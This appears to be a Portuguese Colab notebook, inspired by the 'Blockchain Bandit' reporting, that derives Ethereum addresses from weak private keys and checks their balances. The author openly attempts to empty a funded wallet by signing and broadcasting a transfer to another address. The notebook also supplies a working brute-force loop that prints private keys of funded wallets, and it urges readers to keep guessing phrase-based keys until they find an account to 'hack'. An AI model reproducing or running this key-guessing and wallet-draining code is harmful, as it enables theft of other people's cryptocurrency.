<a href="https://colab.research.google.com/github/marcuspoli/outros/blob/master/Explorando_private_keys.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

Este artigo foi inspirado em reportagens que rodaram o mundo informando a possibilidade de hackers roubarem criptomoedas e tokens explorando vulneralidades de chaves privadas. 
Para quem não viu reportagem alguma, leia **Andy Greenberg**, 'BLOCKCHAIN BANDIT' IS GUESSING PRIVATE KEYS AND SCORING MILLIONS no link abaixo.
https://www.wired.com/story/blockchain-bandit-ethereum-weak-private-keys/

O primeiro teste a ser reproduzido explora a possibilidade de alguém criar manualmente uma das primeiras carteiras do Blockchain.

A ideia é imaginar o que foi feito e reproduzir.

Se quiser ir lendo e executando, execute o link 
https://colab.research.google.com/drive/1fMCz3G7D_l5_FAsmpdRIAMEhZqPwcPP5


Primeiro, instalamos a biblioteca eth_account.

In [0]:
!pip install eth_account

Depois importamos e encontramos o endereço público da primeira carteira.

In [0]:
import eth_account
Account = eth_account.Account()
var1 = ''
var1 = var1.zfill(64)
var1 = '0x' + var1
print('A primeira chave privada do Blockchain é ' + var1)
acct = Account.privateKeyToAccount( var1 )
print('O endereço público dessa chave é ' + acct.address)

A primeira chave privada do Blockchain é 0x0000000000000000000000000000000000000000000000000000000000000000
O endereço público dessa chave é 0x3f17f1962B36e491b30A40b2405849e597Ba5FB5


Se fizemos tudo certo, descobrimos que a chave pública da primeira carteira do Blockchain é a 0x3f17f1962B36e491b30A40b2405849e597Ba5FB5.

Agora vamos ver se há saldo nessa carteira.

Para saber se há saldo pesquisamos o endereço da carteira no serviço da Etherscan https://etherscan.io/address/0x3f17f1962B36e491b30A40b2405849e597Ba5FB5

Hoje, primeiro de maio de dois mil e dezenove, há um saldo de aproximadamente mil e setecentos dólares nessa carteira, ou seja, um pouco mais de dez ETH e cinquenta e oito tokens ERC-20 também.

Você deve estar pensando qual o motivo de não esvaziarmos essa carteira e quer saber, não era o nosso objetivo, mas vamos lá. 




O primeiro teste para esvaziar este cofre foi o de importar a chave privada no METAMASK. Infelizmente, a resposta foi "Cannot import invalid private key."

O segundo foi abrir o site do MyEtherWallet 
https://vintage.myetherwallet.com/#view-wallet-info e para a minha infelicidade, a mensagem foi parecida '(error_41) Please enter a valid private key'

A terceira e ultima tentativa foi a de programar uma parte e postar no Blockchain através da API da Etherscan. O código usado está abaixo.


In [0]:
transaction = {
#        'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
        'to': '0x8D0785c7e1C107921Ae869B541ad8D81EFacA927',
        'value': 1000000000,
        'gas': 2000000,
        'gasPrice': 7654321,
        'nonce': 0,
    }
signed = acct.signTransaction(transaction)
print(signed)

AttrDict({'rawTransaction': HexBytes('0xf867808374cbb1831e8480948d0785c7e1c107921ae869b541ad8d81efaca927843b9aca00801ba0a9a3f9cb989bf53359e502f310de882442b4d363b0a320978eb79682f28c7a96a049c5a071b1882086f63e3fec6d6c947da64fe8dc1072fd2bef745ec0e0218de8'), 'hash': HexBytes('0x0e17d2bf851e2737d531c219de1e5f67906104d4076a115f1ee1cd3daa4218f4'), 'r': 76730591505912046220150939802083475462038935837246312755004272816564688681622, 's': 33368014162925522991879316326015973436287912077046728404057946927745565036008, 'v': 27})


A boa noticia é que conseguimos criar a transação assinada com a chave privada.

Agora, vamos cruzar os dedos e postar no blockchain essa transação. 
O que interessa para passarmos no parametro é o resultado que está dentro do HexBytes('') do resultado acima.
Veja como ficaria o link para postarmos:
https://api.etherscan.io/api?module=proxy&action=eth_sendRawTransaction&hex=0xf867808374cbb1831e8480948d0785c7e1c107921ae869b541ad8d81efaca927843b9aca00801ba0a9a3f9cb989bf53359e502f310de882442b4d363b0a320978eb79682f28c7a96a049c5a071b1882086f63e3fec6d6c947da64fe8dc1072fd2bef745ec0e0218de8&apikey=YourApiKeyToken

Nao adiantou, não deu certo novamente.
{"jsonrpc":"2.0","id":1,"error":{"code":-32000,"message":"invalid sender"}}

Desconfiei do parametro apiKey=YourApiKeyToken e troquei por um token que tenho e a mesma mensagem apareceu.

Descomentei o "from" do código acima e postei novamente com o novo hash e a mesma mensagem apareceu. Que frustração. Pensei que passaria um fim de semana de rei, porém, não foi dessa vez. :( 

Mas essa foi só a primeira conta do Blockchain e as próximas? Será que há saldos como essa aí? Vamos fazer um consulta nas próximas cem contas.

Primeiro instalamos uma biblioteca chamada urlopen, pois, nao queremos sair no CTRL+C e CTRL+V em cada chave pública que capturamos.

In [0]:
!pip install urlopen

Agora, criamos o programa considerando as chaves complementares que partem de 01 até 99 e pesquisamos automaticamente utilizando uma API de consulta em JSON.

In [0]:
from urllib.request import urlopen
for x in range(1,10):
    compl = str(x)
    compl = compl.zfill(2)
    acct = Account.privateKeyToAccount( '0x00000000000000000000000000000000000000000000000000000000000000' + compl )
    url = 'https://api.etherscan.io/api?module=account&action=balance&address=' + acct.address
    response = urlopen(url)
    print('lendo ' + url)
    print(response.read())
    

lendo https://api.etherscan.io/api?module=account&action=balance&address=0x7E5F4552091A69125d5DfCb7b8C2659029395Bdf
b'{"status":"1","message":"OK","result":"0"}'
lendo https://api.etherscan.io/api?module=account&action=balance&address=0x2B5AD5c4795c026514f8317c7a215E218DcCD6cF
b'{"status":"1","message":"OK","result":"0"}'
lendo https://api.etherscan.io/api?module=account&action=balance&address=0x6813Eb9362372EEF6200f3b1dbC3f819671cBA69
b'{"status":"1","message":"OK","result":"0"}'
lendo https://api.etherscan.io/api?module=account&action=balance&address=0x1efF47bc3a10a45D4B230B5d10E37751FE6AA718
b'{"status":"1","message":"OK","result":"0"}'
lendo https://api.etherscan.io/api?module=account&action=balance&address=0xe1AB8145F7E55DC933d51a18c793F901A3A0b276
b'{"status":"1","message":"OK","result":"0"}'
lendo https://api.etherscan.io/api?module=account&action=balance&address=0xE57bFE9F44b819898F47BF37E5AF72a0783e1141
b'{"status":"1","message":"OK","result":"0"}'
lendo https://api.etherscan.

Infelizmente, não há saldos nessas contas.
Porém, conseguimos reproduzir o que seriam algumas das chaves privadas consideradas fracas para os Hackers.

Há um outro meio de explorarmos chaves fracas que consiste em adivinhar a frase que o criador da chave colocou para facilitar a memorização. 
Como funciona este processo de adivinhação? Sabemos que a composição da chave privada é sempre 32 bytes representados graficamente em 64 Hexadecimais, logo, se imaginarmos que alguém codificasse a frase com 32 letras [SATOSHI NAKAMOTONAKAMOTO SATOSHI], chegariamos a composição de uma chave privada de 64 hexadecimais e teriamos a chave privada completa.

Veja como ficaria.



In [0]:
segredo = 'SATOSHI NAKAMOTONAKAMOTO SATOSHI'
chave_privada = '0x'
for x in segredo:
  chave_privada = chave_privada + str(hex(ord(x)))[2:]
chave_privada = chave_privada.ljust(66, '0')
if len(chave_privada) > 66:
  print("A chave privada ultrapassa o tamanho máximo. Veja se a variável segredo tem mais 32 chars")
else:
  print(chave_privada)

0x5341544f534849204e414b414d4f544f4e414b414d4f544f205341544f534849


Como o objetivo é pescar uma carteira que tenha saldo, mude o valor atribuido a variavel "segredo" e execute a pesquisa do saldo no código abaixo.

In [0]:
acct = Account.privateKeyToAccount( chave_privada )
print('a chave pública é ' + acct.address)
url = 'https://api.etherscan.io/api?module=account&action=balance&address=' + acct.address
response = urlopen(url)
print('lendo ' + url)
print(response.read())

a chave pública é 0x343Ee1aB9b88671267372aBdD5810b21062984f2
lendo https://api.etherscan.io/api?module=account&action=balance&address=0x343Ee1aB9b88671267372aBdD5810b21062984f2
b'{"status":"1","message":"OK","result":"0"}'


Você pode mudar o valor da variavel "segredo" procurando por outras palavras ou frases de até 32 caracteres até encontrar alguma conta com saldo a ser hackeada, lembrando que as palavras podem combinar caracteres maiúsculos e minúsculos, números, acentuações etc...

Por fim, há também uma suposta falha no randômico que pode ser explorada com umas mil horas de paciência em servidores na nuvem. O objetivo é esperar que o randômico da biblioteca "random" imprima uma carteira que já foi utilizada.

Bom, eu nao vou esperar.
Boa sorte e se tiver mais alguma ideia, contribua também.



In [0]:
import random
import eth_account
import json
from urllib.request import urlopen
Account = eth_account.Account()
i = 0
x = 0
while i < 2:
    x = x + 1
    bits = random.getrandbits(256)
    bits_hex= hex(bits)
    bits_hex=bits_hex.ljust(66, '0')
   # print('bits_hex=' + bits_hex)
    if (x % 10) == 0:
      print('carteiras lidas [' + str(x) + ']')
    acct = Account.privateKeyToAccount( bits_hex )
    url = 'https://api.etherscan.io/api?module=account&action=balance&address=' + acct.address
    response = urlopen(url)
    data = response.read()
    encoding = response.info().get_content_charset('utf-8')
    JSON_object = json.loads(data.decode(encoding))
    for p in JSON_object:
        key = p
        value = JSON_object[p]
        if (key == 'result') :
            if (value != '0'):
                i = i + 1
                print('lendo ' + str(x))
                print('Chave pública=' + acct.address)
                print('Chave privada=' + acct.privateKey.hex())
                print("O saldo da conta no blockchain é de = ({})".format(value))
                input("pressione uma tecla qualquer para continuar")
